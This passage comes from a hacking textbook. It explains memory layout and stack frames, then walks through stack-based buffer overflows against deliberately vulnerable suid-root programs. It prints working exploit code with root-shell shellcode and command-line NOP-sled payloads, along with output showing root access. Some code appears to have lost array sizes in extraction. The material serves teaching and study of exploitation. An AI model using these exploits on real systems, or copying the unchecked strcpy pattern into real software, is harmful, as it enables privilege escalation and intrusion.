static program variables. The data segment is filled with the initialized global variables, strings, and other constants that are used through the program. The bss segment is filled with the uninitialized counterparts. Although these segments are writable, they also have a fixed size. The heap segment is used for the rest of the program variables. One notable point about the heap segment is that it isn't of fixed size, meaning it can grow larger or smaller as needed. All of the memory within the heap is managed by allocator and deallocator algorithms, which respectively reserve a region of memory in the heap for use and remove reservations to allow that portion of memory to be reused for later reservations. The heap will grow and shrink depending on how much memory is reserved for use. The growth of the heap moves downward toward higher memory addresses. The stack segment also has variable size and is used as a temporary scratchpad to store context during function calls. When a program calls a function, that function will have its own set of passed variables, and the function's code will be at a different memory location in the text (or code) segment. Because the context and the EIP must change when a function is called, the stack is used to remember all of the passed variables and where the EIP should return to after the function is finished. In general computer science terms, a stack is an abstract data structure that is used frequently. It has first-in, last-out (FILO) ordering, which means the first item that is put into a stack is the last item to come out of it. Like putting beads on a piece of string that has a giant knot on the end, you can't get the first bead off until you have removed all the other beads. When an item is placed into a stack, it's known as pushing, and when an item is removed from a stack, it's called popping. As the name implies, the stack segment of memory is, in fact, a stack data structure. The ESP register is used to keep track of the address of the end of the stack, which is constantly changing as items are pushed into and popped from it. Because this is very dynamic behavior, it makes sense that the stack is also not of a fixed size. Opposite to the growth of the heap, as the stack changes in size, it grows upward toward lower memory addresses. The FILO nature of a stack might seem odd, but because the stack is used to store context, it's very useful. When a function is called, several things are pushed to the stack together in a structure called a stack frame. The EBP register (sometimes called the frame pointer (FP) or local base pointer (LB)) is used to reference variables in the current stack frame. Each stack frame contains the parameters to the function, its local variables, and two pointers that are necessary to put things back the way they were: the saved frame pointer (SFP) and the return address. The stack frame pointer is used to restore EBP to its previous value, and the return address is used to restore EIP to the next instruction found after the function call. Here's an example test function and main function: void test_function(int a, int b, int c, int d) { char flag; char buffer; } void main() { test_function(1, 2, 3, 4); } This small code segment first declares a test function that has four arguments, which are all declared as integers: a, b, c, and d. The local variables for the function include a single character called flag and a 10-character buffer called buffer. The main function is executed when the program is run, and it simply calls the test function. When the test function is called from the main function, the various values are pushed to the stack to create the stack frame as follows. When test_function() is called, the function arguments are pushed onto the stack in reverse order (because it's FILO). The arguments for the function are 1, 2, 3, and 4, so the subsequent push instructions push 4, 3, 2, and finally 1 onto the stack. These values correspond to the variables d, c, b, and a in the function. When the assembly "call" instruction is executed, to change the execution context to test_function(), the return address is pushed onto the stack. This value will be the location of the instruction following the current EIP — specifically the value stored during step 3 of the previously mentioned execution loop. The storage of the return address is followed by what is called the procedure prolog occurs. In this step, the current value of EBP is pushed to the stack. This value is called the saved frame pointer (SFP) and is later used to restore EBP back to its original state. The current value of ESP is then copied into EBP to set the new frame pointer. Finally, memory is allocated on the stack for the local variables of the function (flag and buffer) by subtracting from ESP. The memory allocated for these local variables isn't pushed to the stack, so the variables are in expected order. In the end, the stack frame looks something like this: This is the stack frame. Local variables are referenced by subtracting from the frame pointer EBP, and the function arguments are referenced by adding to it. When a function is called, the EIP is changed to the address of the beginning of the function in the text (or code) segment of memory to execute it. Memory in the stack is used for the function's local variables and the function arguments. After the execution finishes, the entire stack frame is popped off the stack, and the EIP is set to the return address so the program can continue execution. If another function were called within the function, another stack frame would be pushed onto the stack, and so on. As each function ends, its stack frame is popped off the stack so execution can be returned to the previous function. This behavior is why this segment of memory is organized in a FILO data structure. The various segments of memory are arranged in the order they were presented, from the lower memory addresses to the higher memory addresses. Because most people are familiar with seeing lists that count downward, the smaller memory addresses are shown at the top. Because the heap and the stack are both dynamic, they both grow in different directions toward each other. This minimizes wasted space and the possibility of either segments growing into each other. 0x260 Buffer Overflows C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language. While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or overflow, since the extra two bytes of data will overflow and spill out the end of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The following code offers an example. overflow.c code void overflow_function (char *str) { char buffer; strcpy(buffer, str); // Function that copies str to buffer } int main() { char big_string; int i; for(i=0; i < 128; i++) // Loop 128 times { big_string[i] = 'A'; // And fill big_string with 'A's } overflow_function(big_string); exit(0); } The preceding code has a function called overflow_function() that takes in a string pointer called str and then copies whatever is found at that memory address into the local function variable buffer, which has 20 bytes allocated for it. The main function of the program allocates a 128-byte buffer called big_string and uses a for loop to fill the buffer with As. Then it calls the overflow_function() with a pointer to that 128-byte buffer as its argument. This is going to cause problems, as overflow_function() will try to cram 128 bytes of data into a buffer that only has 20 bytes allocated to it. The remaining 108 bytes of data will just spill out over whatever is found after it in memory space. Here are the results: $ gcc -o overflow overflow.c $./overflow Segmentation fault $ The program crashed as a result of the overflow. For a programmer, these types of errors are common and are fairly easy to fix, as long as the programmer knows how big the expected input is going to be. Often, the programmer will anticipate that a certain user input will always be a certain length and will use that as a guide. But once again, hacking involves thinking about things that weren't anticipated, and a program that runs fine for years might suddenly crash when a hacker decides to try inputting a thousand characters into a field that normally only uses several dozen, like a username field. So a clever hacker can cause a program to crash by inputting unanticipated values that cause buffer overflows, but how can this be used to take control of a program? The answer can be found by examining the data that actually gets overwritten. 0x270 Stack-Based Overflows Referring back to the sample overflow program, overflow.c, when overflow_function() is called, a stack frame is pushed onto the stack. When the function is first called, the stack frame looks something like this: But when the function tries to write 128 bytes of data into the 20-byte buffer, the extra 108 bytes spill out, overwriting the stack frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As, which is 0x41 in hexadecimal. The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. This is called a stack-based overflow, because the overflow is occurring in the stack memory segment. Overflows can happen in other memory segments also, such as the heap or bss segments, but what makes stack-based overflows more versatile and interesting is that they can overwrite a return address. The program crashing as a result of a stack-based overflow isn't really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141, such as an address where actual executable code was located, then the program would "return" to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user. Because it's possible to modify the return address to change the flow of execution by overflowing buffers, all that's needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers. There are several restrictions on bytecode: It has to be self-contained and it needs to avoid certain special characters in its instructions because it's supposed to look like data in buffers. The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell. If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing. Here is an example: vuln.c code int main(int argc, char *argv[]) { char buffer; strcpy(buffer, argv); return 0; } This is a piece of vulnerable program code that is similar to overflow_function() from before, as it inputs a single argument and tries to cram whatever that argument holds into its 500-byte buffer. Here are the uneventful results of this program's compilation and execution: $ gcc -o vuln vuln.c $./vuln test The program really does nothing, except mismanage memory. Now to make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary: $ sudo chown root vuln $ sudo chmod +s vuln $ ls -l vuln -rwsr-sr-x 1 root users 4933 Sep 5 15:22 vuln Now that vuln is a suid root program that's vulnerable to a buffer overflow, all that's needed is a piece of code to generate a buffer that can be fed to the vulnerable program. This buffer should contain the desired shellcode and should overwrite the return address in the stack so that the shellcode will get executed. This means the actual address of the shellcode must be known ahead of time, which can be difficult to know in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of this address. Even if the correct address is known, but the proper location isn't overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery. The first is known as a NOP sled (NOP is short for no operation). This is a single byte instruction that does absolutely nothing. These are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture due to instruction pipelining. In this case, these NOP instructions are going to be used for a different purpose; they're going to be used as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly. The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired. Here is a representation of a crafted buffer: Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, when the offset isn't 0. The following is exploit code, designed to create a buffer and feed it to the vulnerable program, hopefully tricking it into executing the injected shellcode when it crashes, instead of just crashing and dying. The exploit code first gets the current stack pointer and subtracts an offset from that. In this case the offset is 0. Then memory for the buffer is allocated (on the heap) and the entire buffer is filled with the return address. Next, the first 200 bytes of the buffer are filled with a NOP sled (the NOP instruction in machine language for the x86 processor is equivalent to 0x90). Then the shellcode is placed after the NOP sled, leaving the remaining last portion of the buffer filled with the return address. Because the end of a character buffer is designated by a null byte, or 0, the buffer is ended with a 0. Finally another function is used to run the vulnerable program and feed it the specially crafted buffer. exploit.c code #include char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; unsigned long sp(void) // This is just a little function { __asm__("movl %esp, %eax");} // used to return the stack pointer int main(int argc, char *argv[]) { int i, offset; long esp, ret, *addr_ptr; char *buffer, *ptr; offset = 0; // Use an offset of 0 esp = sp(); // Put the current stack pointer into esp ret = esp - offset; // We want to overwrite the ret address printf("Stack pointer (ESP) : 0x%x\n", esp); printf(" Offset from ESP : 0x%x\n", offset); printf("Desired Return Addr : 0x%x\n", ret); // Allocate 600 bytes for buffer (on the heap) buffer = malloc(600); // Fill the entire buffer with the desired ret address ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 600; i+=4) { *(addr_ptr++) = ret; } // Fill the first 200 bytes of the buffer with NOP instructions for(i=0; i < 200; i++) { buffer[i] = '\x90'; } // Put the shellcode after the NOP sled ptr = buffer + 200; for(i=0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } // End the string buffer[600-1] = 0; // Now call the program./vuln with our crafted buffer as its argument execl("./vuln", "vuln", buffer, 0); // Free the buffer memory free(buffer); return 0; } Here are the results of the exploit code's compilation and subsequent execution: $ gcc -o exploit exploit.c $./exploit Stack pointer (ESP) : 0xbffff978 Offset from ESP : 0x0 Desired Return Addr : 0xbffff978 sh-2.05a# whoami root sh-2.05a# Apparently it worked. The return address in the stack frame was overwritten with the value 0xbffff978, which happens to be the address of the NOP sled and shellcode. Because the program was suid root, and the shellcode was designed to spawn a user shell, the vulnerable program executed the shellcode as the root user, even though the original program was only meant to copy a piece of data and exit. 0x271 Exploiting Without Exploit Code Writing an exploit program to exploit a program will certainly get the job done, but it does put a layer between the prospective hacker and the vulnerable program. The compiler takes care of certain aspects of the exploit, and having to adjust the exploit by making changes to a program removes a certain level of interactivity from the exploit process. In order to really gain a full understanding of this topic, which is so rooted in exploration and experimentation, the ability to quickly try different things is vital. Perl's print command and bash shell's command substitution with grave accents are really all that are needed to exploit the vulnerable program. Perl is an interpreted programming language that has a print command that happens to be particularly suited to generating long sequences of characters. Perl can be used to execute instructions on the command line using the -e switch like this: $ perl -e 'print "A" x 20;' AAAAAAAAAAAAAAAAAAAA This command tells Perl to execute the commands found between the single quotes — in this case, a single command of ‘print "A" x 20;’. This command prints the character A 20 times. Any character, such as nonprintable characters, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41. $ perl -e 'print "\x41" x 20;' AAAAAAAAAAAAAAAAAAAA In addition, string concatenation can be done in Perl with the period (.) character. This can be useful when stringing multiple addresses together. $ perl -e 'print "A"x20. "BCD". "\x61\x66\x67\x69"x2. "Z";' AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ Command substitution is done with the grave accent (‘) — the character that looks like a tilted single quote and is found on the same key as the tilde. Anything found between two sets of grave accents is executed, and the output is put in its place. Here are two examples: $ 'perl -e 'print "uname";'' Linux $ una'perl -e 'print "m";''e Linux $ In each case, the output of the command found between the grave accents is substituted for the command, and the command of uname is executed. All the exploit code really does is get the stack pointer, craft a buffer, and feed that buffer to the vulnerable program. Armed with Perl, command substitution, and an approximate return address, the work of the exploit code can be done on the command line by simply executing the vulnerable program and using grave accents to substitute a crafted buffer into the first argument. First the NOP sled must be created. In the exploit.c code, 200 bytes of NOP sled was used; this is a good amount, as it provides for 200 bytes of guessing room for the return address. This extra guessing room is more important now, because the exact stack pointer address isn't known. Remembering that the NOP instruction is 0x90 in hexadecimal, the sled can be created using a pair of grave accents and Perl, as follows: $./vuln 'perl -e 'print "\x90"x200;'' The shellcode should then be appended to the NOP sled. It's quite useful to have the shellcode existing in a file somewhere, so putting the shellcode into a file should be the next step. Because all the bytes are already spelled out in hexadecimal in the beginning of the exploit, these bytes just need to be written to a file. This can be done using a hex editor or using Perl's print command with the output redirected to a file, as shown here: $ perl -e 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x8 9\x 43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x 73\ x68";' > shellcode Once this is done, the shellcode exists in a file called "shellcode". The shellcode can now be easily inserted anywhere with a pair of grave accents and the cat command. Using this method, the shellcode can be added to the existing NOP sled: $./vuln 'perl -e 'print "\x90"x200;'"cat shellcode' Next, the return address, repeated several times, must be appended, but there is already something wrong with the exploit buffer. In the exploit.c code, the exploit buffer was filled with the return address first. This made sure the return address was properly aligned, because it consists of four bytes. This alignment must be manually accounted for when crafting exploit buffers on the command line. What this boils down to is this: The number of bytes in the NOP sled plus the shellcode must be divisible by 4. Because the shellcode is 46 bytes, and the NOP sled is 200 bytes, a bit of simple arithmetic will show that 246 isn't divisible by 4. It is off by 2 bytes, so the repeated return address will be misaligned by 2 bytes, causing the execution to return somewhere unexpected. In order to properly align the section of repeated return addresses, an additional 2 bytes should be added to the NOP sled: $./vuln 'perl -e 'print "A"x202;'"cat shellcode' Now that the first part of the exploit buffer is properly aligned, the repeated return address just has to be added to the end. Because 0xbffff978 was where the stack pointer was last, that makes a good approximate return address. This return address can be printed using "\x78\xf9\xff\bf". The bytes are reversed due to the little-endian byte ordering on the x86 architecture. This is a subtlety that can sometimes be overlooked when just using exploit code that does the ordering automatically. Because the target length for the exploit buffer is about 600 bytes, and the NOP sled and shellcode take up 248 bytes, more simple arithmetic reveals that the return address should be repeated 88 times. This can be done with an additional pair of grave accents and more Perl: $./vuln 'perl -e 'print "\x90"x202;'"cat shellcode"perl -e 'print "\x78\xf9\xff\xbf"x88;'' sh-2.05a# whoami root sh-2.05a# Exploiting at the command line provides for greater control and flexibility over a given exploit technique, which encourages experimentation. For example, it's doubtful that all 600 bytes are really needed to properly exploit the sample vuln program. This threshold can be quickly explored when using the command line. $./vuln 'perl -e 'print "\x90"x202;'"cat shellcode"perl -e 'print "\x68\xf9\xff\xbf"x68;'' $./vuln 'perl -e 'print "\x90"x202;'"cat shellcode"perl -e 'print "\x68\xf9\xff\xbf"x69;'' Segmentation fault $./vuln 'perl -e 'print "\x90"x202;'"cat shellcode"perl -e 'print "\x68\xf9\xff\xbf"x70;'' sh-2.05a# The first execution in the preceding example simply didn't crash and closes cleanly, while the second execution doesn't overwrite enough of the return address, resulting in a crash. However, the final execution properly overwrites the return address, returning execution into the NOP sled and shellcode, which executes a root shell. This level of control over the exploit buffer and the immediate feedback from experimentation is quite valuable in developing a deeper understanding of a system and an exploit technique. 0x272 Using the Environment Sometimes a buffer will be too small to even fit shellcode into. In this case, the shellcode can be stashed in an environment variable. Environment variables are used by the user shell for a variety of things, but the key point of interest is that they are stored in an area of memory that program execution can be redirected to. So if a buffer is too small to fit the NOP sled, shellcode, and repeated return address, the sled and shellcode can be stored in an environment variable with the return address pointing to that address in memory. Here is another vulnerable piece of code, using a buffer that is too small for shellcode: vuln2.c code int main(int argc, char *argv[]) { char buffer; strcpy(buffer, argv); return 0; } Here the vuln2.c code is compiled and set suid root to make it truly vulnerable. $ gcc -o vuln2 vuln2.c $ sudo chown root.root vuln2 $ sudo chmod u+s vuln2 Because the buffer is only five bytes long in vuln2, there is no room for shellcode to be inserted; it must be stored elsewhere. One ideal candidate for holding the shellcode is an environment variable. The execl() function in the exploit.c code, which was used to execute the vulnerable program with the crafted buffer in the first exploit, has a sister function called execle(). This function has one additional argument, which is the environment that the executing process should run under. This environment is presented in the form of an array of pointers to null-terminated strings for each environment variable, and the environment array itself is terminated with a null pointer. This means that an environment containing shellcode can be created by using an array of pointers, the first of which points to the shellcode, and the second consisting of a null pointer. Then the execle() function can be called using this environment to execute the second vulnerable program, overflowing the return address with the address of the shellcode. Luckily, the address of an environment invoked in this manner is easy to calculate. In Linux, the address will be 0xbffffffa, minus the length of the environment, minus the length of the name of the executed program. Because this address will be exact, there is no need for an NOP sled. All that's needed in the exploit buffer is the address, repeated enough times to overflow the return address in the stack. Forty bytes seems like a good number. env_exploit.c code #include char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" "\x68"; int main(int argc, char *argv[]) { char *env = {shellcode, NULL}; int i; long ret, *addr_ptr; char *buffer, *ptr; // Allocate 40 bytes for buffer (on the heap) buffer = malloc(40); // Calculate the location of the shellcode ret = 0xbffffffa - strlen(shellcode) - strlen("./vuln2"); // Fill the entire buffer with the desired ret address ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 40; i+=4) { *(addr_ptr++) = ret; } // End the string buffer[40-1] = 0; // Now call the program./vuln with our crafted buffer as its argument // and using the environment env as its environment. execle("./vuln2", "vuln2", buffer, 0, env); // Free the buffer memory free(buffer); return 0; } This is what happens when the program is compiled and executed: $ gcc -o env_exploit env_exploit.c $./env_exploit sh-2.05a# whoami root sh-2.05a# Of course, this technique can also be used without an exploit program. In the bash shell, environment variables are set and exported using export VARNAME=value. Using export, Perl, and a few pairs of grave accents, the shellcode and a generous NOP sled can be put into the current environment: $ export SHELLCODE='perl -e 'print "\x90"x100;'"cat shellcode' The next step is to find the address of this environment variable. This can be done using a debugger, such as gdb, or by simply writing a little utility program. I'll explain both methods. The point of using a debugger is to open the vulnerable program in the debugger and set a breakpoint right at the beginning. This will cause the program to start execution but then stop before anything actually happens. At this point, memory can be examined from the stack pointer forward by using the gdb command x/20s $esp. This will print out the next 20 strings of memory from the stack pointer. The x in the command is short for examine, and the 20s requests 20 null-terminated strings. Pressing ENTER after this command runs will continue with the previous command, examining the next 20 strings worth of memory. This process can be repeated until the environment variable is found in memory. In the following output, vuln2 is debugged with gdb to examine strings in stack memory in order to find the shellcode stored in the environment variable SHELLCODE (shown in bold). $ gdb vuln2 GNU gdb 5.2.1 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"... (gdb) break main Breakpoint 1 at 0x804833e (gdb) run Starting program: /hacking/vuln2 Breakpoint 1, 0x0804833e in main () (gdb) x/20s $esp 0xbffff8d0: "O\234\002@\204\204\024@ \203\004\bR\202\004\b0\202\004\b\204\204\024@oo؟F\202\004 \b\200ù\004@\204\204\024@(ù؟B،\003@\001" 0xbffff902: "" 0xbffff903: "" 0xbffff904: "Tù\\؟ù\؟200\202\004\b" 0xbffff911: "" 0xbffff912: "" 0xbffff913: "" 0xbffff914: "P¢" 0xbffff917: "@\\C\024@TU\001@\001" 0xbffff922: "" 0xbffff923: "" 0xbffff924: "\200\202\004\b" 0xbffff929: "" 0xbffff92a: "" 0xbffff92b: "" 0xbffff92c: "،\202\004\b8\203\004\b\001" 0xbffff936: "" 0xbffff937: "" 0xbffff938: "Tù؟0\202\004\b \203\004\b\020***" 0xbffff947: "@Lù'؟Z\001@\001" (gdb) 0xbffff952: "" 0xbffff953: "" 0xbffff954: "eْ"؟ 0xbffff959: "" 0xbffff95a: "" 0xbffff95b: "" 0xbffff95c: "tْ\؟201ْْ ؟؟Aْ؟xْ؟Yû؟ïû\؟035ü=؟ü\؟211ü؟¢ü؟Rüؤ؟ü؟Düه؟ü\؟202y\؟227y ?؟y؟Oyَ؟y\؟002p\؟np؟-p؟Up\؟206p\؟220p\؟236p؟p؟Ip؟xp؟U"؟ 0xbffff9d9: "" 0xbffff9da: "" 0xbffff9db: "" 0xbffff9dc: "\020" 0xbffff9de: "" 0xbffff9df: "" 0xbffff9e0: "ù\203\003\006" 0xbffff9e6: "" 0xbffff9e7: "" 0xbffff9e8: "" 0xbffff9e9: "\020" 0xbffff9eb: "" 0xbffff9ec: "\021" (gdb) 0xbffff9ee: "" 0xbffff9ef: "" 0xbffff9f0: "d" 0xbffff9f2: "" 0xbffff9f3: "" 0xbffff9f4: "\003" 0xbffff9f6: "" 0xbffff9f7: "" 0xbffff9f8: "4\200\004\b\004" 0xbffff9fe: "" 0xbffff9ff: "" 0xbffffa00: " " 0xbffffa02: "" 0xbffffa03: "" 0xbffffa04: "\005" 0xbffffa06: "" 0xbffffa07: "" 0xbffffa08: "\006" 0xbffffa0a: "" 0xbffffa0b: "" (gdb) 0xbffffa0c: "\a" 0xbffffa0e: "" 0xbffffa0f: "" 0xbffffa10: "" 0xbffffa11: "" 0xbffffa12: "" 0xbffffa13: "@\b" 0xbffffa16: "" 0xbffffa17: "" 0xbffffa18: "" 0xbffffa19: "" 0xbffffa1a: "" 0xbffffa1b: "" 0xbffffa1c: "\t" 0xbffffa1e: "" 0xbffffa1f: "" 0xbffffa20: "\200\202\004\b\v" 0xbffffa26: "" 0xbffffa27: "" 0xbffffa28: "è\003" (gdb) 0xbffffa2b: "" 0xbffffa2c: "\f" 0xbffffa2e: "" 0xbffffa2f: "" 0xbffffa30: "è\003" 0xbffffa33: "" 0xbffffa34: "\r" 0xbffffa36: "" 0xbffffa37: "" 0xbffffa38: "d" 0xbffffa3a: "" 0xbffffa3b: "" 0xbffffa3c: "\016" 0xbffffa3e: "" 0xbffffa3f: "" 0xbffffa40: "d" 0xbffffa42: "" 0xbffffa43: "" 0xbffffa44: "\017" 0xbffffa46: "" (gdb) 0xbffffa47: "" 0xbffffa48: "'ْ"؟ 0xbffffa4d: "" 0xbffffa4e: "" 0xbffffa4f: "" 0xbffffa50: "" 0xbffffa51: "" 0xbffffa52: "" 0xbffffa53: "" 0xbffffa54: "" 0xbffffa55: "" 0xbffffa56: "" 0xbffffa57: "" 0xbffffa58: "" 0xbffffa59: "" 0xbffffa5a: "" 0xbffffa5b: "" 0xbffffa5c: "" 0xbffffa5d: "" 0xbffffa5e: "" (gdb) 0xbffffa5f: "" 0xbffffa60: "i686" 0xbffffa65: "/hacking/vuln2" 0xbffffa74: "PWD=/hacking" 0xbffffa81: "XINITRC=/etc/X11/xinit/xinitrc" 0xbffffaa0: "JAVAC=/opt/sun-jdk-1.4.0/bin/javac" 0xbffffac3: "PAGER=/usr/bin/less" 0xbffffad7: "SGML_CATALOG_FILES=/etc/sgml/sgml-ent.cat:/etc/sgml/sgml- docbook.cat:/etc/sgml/openjade-1.3.1.cat:/etc/sgml/sgml-docbook- 3.1.cat:/etc/sgml/sgml-docbook-3.0.cat:/etc/sgml/dsssl-docbook-stylesheets.cat:"... 0xbffffb9f: "/etc/sgml/sgml-docbook-4.0.cat:/etc/sgml/sgml-docbook-4.1.cat" 0xbffffbdd: "HOSTNAME=overdose" 0xbffffbef: "CLASSPATH=/opt/sun-jdk-1.4.0/jre/lib/rt.jar:." 0xbffffc1d: "VIMRUNTIME=/usr/share/vim/vim61" 0xbffffc3d: "MANPATH=/usr/share/man:/usr/local/share/man:/usr/X11R6/man:/opt/insight/man" 0xbffffc89: "LESSOPEN=|lesspipe.sh %s" 0xbffffca2: "USER=matrix" 0xbffffcae: "MAIL=/var/mail/matrix" 0xbffffcc4: "CVS_RSH=ssh" 0xbffffcd0: "INPUTRC=/etc/inputrc" 0xbffffce5: "SHELLCODE=", '\220' , "1A°F1U1ةI\200ë\026[1A\210C\a\211[\b\211C\f°\v\215K\b\215S\fI\200èه/bin/sh" 0xbffffd82: "EDITOR=/usr/bin/nano" (gdb) 0xbffffd97: "CONFIG_PROTECT_MASK=/etc/gconf" 0xbffffdb6: "JAVA_HOME=/opt/sun-jdk-1.4.0" 0xbffffdd3: "SSH_CLIENT=10.10.10.107 3108 22" 0xbffffdf3: "LOGNAME=matrix" 0xbffffe02: "SHLVL=1" 0xbffffe0a: "MOZILLA_FIVE_HOME=/usr/lib/mozilla" 0xbffffe2d: "INFODIR=/usr/share/info:/usr/X11R6/info" 0xbffffe55: "SSH_CONNECTION=10.10.10.107 3108 10.10.11.110 22" 0xbffffe86: "_=/bin/sh" 0xbffffe90: "SHELL=/bin/sh" 0xbffffe9e: "JDK_HOME=/opt/sun-jdk-1.4.0" 0xbffffeba: "HOME=/home/matrix" 0xbffffecc: "TERM=linux" 0xbffffed7: "PATH=/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/opt/sun- jdk-1.4.0/bin:/opt/sun-jdk- 1.4.0/jre/bin:/opt/insight/bin:.:/opt/j2re1.4.1/bin:/sbin:/usr/sbin:/usr/local/sbin :/home/matrix/bin:/sbin"... 0xbfffff9f: ":/usr/sbin:/usr/local/sbin:/sbin:/usr/sbin:/usr/local/sbin" 0xbfffffda: "SSH_TTY=/dev/pts/1" 0xbfffffed: "/hacking/vuln2" 0xbffffffc: "" 0xbffffffd: "" 0xbffffffe: "" (gdb) x/s 0xbffffce5 0xbffffce5: "SHELLCODE=", '\220' , "1A°F1U1ةI\200ë\026[1A\210C\a\211[\b\211C\f°\v\215K\b\215S\fI\200èه/bin/sh" (gdb) x/s 0xbffffcf5 0xbffffcf5: '\220' , "1A°F1U1ةI\200ë\026[1A\210C\a\211[\b\211C\f°\v\215K\b\215S\fI\200èه/bin/sh" (gdb) quit The program is running. Exit anyway? (y or n) y After finding the address where the environment variable SHELLCODE is located, the command x/s is used to examine just that string. But this address includes the string "SHELLCODE=", so 16 bytes are added to the address to provide an address that is located somewhere in the NOP sled. The 100 bytes of the NOP sled provide for quite a bit of wiggle room, so there's no need to be exact. The debugger has revealed that the address 0xbffffcf5 is right near the beginning of the NOP sled, and the shellcode is stored in the environment variable SHELLCODE. Armed with this knowledge, some more Perl, and a pair of grave accents, the vulnerable program can be exploited, as follows. $./vuln2 'perl -e 'print "\xf5\xfc\xff\xbf"x10;'' sh-2.05a# whoami root sh-2.05a# Once again, the threshold of how long the overflow buffer really needs to be can be quickly investigated. As the following experiments show, 32 bytes is as small as the buffer can get and still overwrite the return address. $./vuln2 'perl -e 'print "\xf5\xfc\xff\xbf"x10;'' sh-2.05a# exit $./vuln2 'perl -e 'print "\xf5\xfc\xff\xbf"x9;'' sh-2.05a# exit $./vuln2 'perl -e 'print "\xf5\xfc\xff\xbf"x8;'' sh-2.05a# exit $./vuln2 'perl -e 'print "\xf5\xfc\xff\xbf"x7;'' Segmentation fault $ Another way to retrieve the address of an environment variable is to write a simple helper program. This program can simply use the well-documented getenv() function to look for the first program argument in the environment. If it can't find anything, the program exits with a status message, and if it finds the variable, it prints out the address of it. getenvaddr.c code #include int main(int argc, char *argv[]) { char *addr; if(argc < 2) { printf("Usage:\n%s \n", argv); exit(0); } addr = getenv(argv); if(addr == NULL) printf("The environment variable %s doesn't exist.\n", argv); else printf("%s is located at %p\n", argv, addr); return 0; } The following shows the getenvaddr.c program's compilation and execution to find the address of the environment variable SHELLCODE. $ gcc -o getenvaddr getenvaddr.c $./getenvaddr SHELLCODE SHELLCODE is located at 0xbffffcec $ This program returns a slightly different address than gdb did. This is because the context for the helper program is slightly different than when the vulnerable program is executed, which is also slightly different than when the vulnerable program is executed in gdb. Luckily the 100 bytes of NOP sled is more than enough to allow these slight inconsistencies to slide. $./vuln2 'perl -e 'print "\xec\xfc\xff\xbf"x8;'' sh-2.05a# whoami root sh-2.05a# Just slapping a huge NOP sled to the front of shellcode, however, is like playing pool with slop. Sure the root shell pops up or the balls go in, but oftentimes it's by accident, and the experience doesn't teach that much. Playing with slop is for amateurs — the experts can sink balls exactly in the pockets they call. In the world of program exploitation, the difference is between knowing exactly where something will be in memory and just guessing. In order to be able to predict an exact memory address, the differences in the addresses must be explored. The length of the name of the program being executed seems to have an effect on the address of the environment variables. This effect can be further explored by changing the name of the helper program and experimenting. This type of experimentation and pattern recognition is an important skill set for a hacker to have. $ gcc -o a getenvaddr.c $./a SHELLCODE SHELLCODE is located at 0xbffffcfe $ cp a bb $./bb SHELLCODE 